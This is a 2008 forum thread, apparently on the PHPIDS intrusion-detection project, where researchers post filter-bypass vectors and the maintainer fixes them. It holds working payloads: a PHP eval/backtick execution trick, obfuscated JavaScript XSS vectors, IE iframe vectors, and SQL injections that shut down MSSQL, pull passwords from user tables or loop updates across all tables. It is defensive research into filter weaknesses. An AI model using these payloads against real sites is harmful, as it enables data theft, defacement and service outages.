question - what does the above do, and how does it work?

I assume it executes PHP code located at that link?



Edited 1 time(s). Last edit at 07/30/2008 06:00AM by Kyo.

It tries to upload your php file to attacked server. I think this advisory explains it best:
http://www.hardened-php.net/advisory_042006.119.html

This vector is useful against preg_replace and sometimes eval (bugs like: <?php eval('$var="'.addslashes($_GET['var']).'";'); ?>).

Simply:
{${function()}} substites ".function()."
`` substitutes shell_exec()

And what you meant would rather look like:
http://www.securityfocus.com/archive/1/448007/100/0/threaded

Whatever it does - it's a nice circumvention. And it's fixed. Please excuse my late response but my workspace IP is still banned due to whatever reason so I can only respond from home (although I pinged id multiple times).

Thank you CM and Ipilorz - your comments and findings were great and are being reflected in the current trunk revision - I will mention you as usual in the next release notes!

@Kyo: Back ticks - love them.

Greetings,
.mario

Oh right, so PHPIDS uses the /e flag at some point, then. Yeah, that makes it make sense again (though I did not know you could use ´ in php)

Well that calms me, for a moment there I thought that I might be vulnerable. You never know, if you look at some of the shit PHP has done, security wise, in the past (particularly register globals...)

I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize it:

a>>/al/+/ert/|a(0)

Thanks!

EDIT: This vector doesn't seems to work! My browser is crazy :).



Edited 1 time(s). Last edit at 08/02/2008 01:42AM by C1c4Tr1Z.

This is the right forum to post it.. good job boludo! :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

@C1c4Tr1Z

Doesn't seem to be a valid vector dude

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Gareth - He actually IM'd me and said that it worked the first 15 times, but then it stopped working and doesn't know why. He says his Eglish is not that good, but I don't believe him either.. ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

the only thing like that I got to work is
top[/alert/.source](0)|a
but that doesn't pass the filter

@all: I think a was accidentally assigned with alert or something else before - like:

a=alert
a>>/al/+/ert/|a(0)

Which of course results in an impact of 8 ;)

Greetings,
.mario

@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us:

a=alert,a(0)

I was playing with something like this, but his impact is 35.:D

a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0)

bye!

Here's one technique which produces a impact of 4, it could be turned into a vector quite easily:-
1[<t>__par{new Array}ent__</t>][<t>al{new Array}ert</t>](1)

I love E4X :)

See if anyone can do it before mario reads it and fixes it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

read and fixed ;)

very nice tecnique btw!

C1c4Tr1Z Wrote:

Quote

@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us:

how exactly were you testing this from p42.us?

@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)

@C1c4Tr1Z ah, i see. just wanted to make sure i hadn't been hacked or anything like that :)

MSSQL:
asd'; shutdown;

PostgreSQL:

The "null" seems to irritate the filter rules. this works perfectly on postgreSQL, because postgreSQL returns the output of the last stacked query.

asd'; select null,password,null from users;

PostgreSQL also supports union distinct select, which in combination with a "(" is not in the filter rules.

asd' union distinct(select null,password,null from users)--a

I think there are a lot more vectors possible with postgreSQL, its pretty flexible. for mssql there are some transactSQL injections possible, like

aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor

but since I found no way of declaring variables (declare @var varchar(32)) I cant build any cool vectors ;)

maybe someone else has some ideas, latest version with impact = 0:

aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user 
OPEN tablecursor FETCH NEXT FROM tablecursor INTO @a,@b WHILE(@a != null) 
@query  = null+null+null+null+ ' UPDATE '+null+@a+null+ ' SET id=null,@b = @payload'
BEGIN EXEC sp_executesql @query
FETCH NEXT FROM tablecursor INTO @a,@b END
CLOSE tablecursor DEALLOCATE tablecursor;
and some text, to get pass the centrifuge; and some more text.

whats missing is the correct concat of the @query with @b

@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'

but then I cant get around the centrifuge anymore ;) and of course the declaration of the vars.



Edited 2 time(s). Last edit at 08/07/2008 12:48PM by Reiners.

@reiners: impressive :)

Phew - impressive indeed! All fixed for now but I am sure there's more...

Thx!
.mario

some notes for the fixes:

Quote

asd' union distinct ( select null,password,(null)from user )-- a

still works, because distinct is missing in the filter:

Quote

(?:union\s*(?:all)?\s*[([]\s*select)

and the (null) evates the filter

Quote

(?:select\s[\s\w\.,-]+\sfrom)

note, that you can also do something like:

Quote

asd asd asd'; END; select(pass)from users

on MSSQL and PostgreSQL.

The CURSOR I declared in my previous post was maybe a bit misleading. the syntax is:
DECLARE yourcursorname CURSOR FOR yoursqlstatement

Too bad you are going to fix this, there is a lot of potential in those stored procedure type of injections.

Thanks - fixed ;)

Do you know which characters are allowed for the cursornames? Just \w or . and - too?

just \w is allowed for cusornames.

IE only window.name vector:-

<iframe name="expression(alert(1))" src="http://demo.phpids.org/?test=%28new%20Option%29.style.setExpression%281%2C1%26%26name%29"></iframe>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Huh?

<edit>
Ah ;)
</edit>



Edited 1 time(s). Last edit at 08/26/2008 04:24PM by .mario.

Yeah sorry I couldn't be bothered uploading a file :)

uses window.name to execute

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Very nice indeed! I didn't know yet that you could set expressions like that - shame on me ;) Fixed...

MSSQL allows [brackets] around column and table.

asd'; select [column] from users

edit:
ok, the above injection wouldnt work because of unclosed quotes. this one would do it:
asd'; select [column] from table where 1 like '1


edit²:
note, that if you use brackets, whitespaces are not neccessary anymore:
asaa';SELECT[asd]FROM[asd]



Edited 2 time(s). Last edit at 08/31/2008 10:02AM by Reiners.

Another IE only vector

<iframe src=http://demo.phpids.org/?test=document.URL%3D1%26%26name name="javascript:alert(/Mmmmmm URL vector/)">

Uses window.name so the actual vector is:-
document.URL=1&&name

http://www.businessinfo.co.uk/labs/phpids/urlvector.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/01/2008 03:36AM by Gareth Heyes.

@Reiners: Nice find but damn - that's not easy to handle. I will think about a good way this weekend. Thanks!

@Gareth: whoops - somehow URL disappeared from one rule. Fixed - 10x!!

<edit>
@Reiners: What characters are allowed fom MSSQL col names? \w and - or more?
</edit>



Edited 1 time(s). Last edit at 09/01/2008 10:28AM by .mario.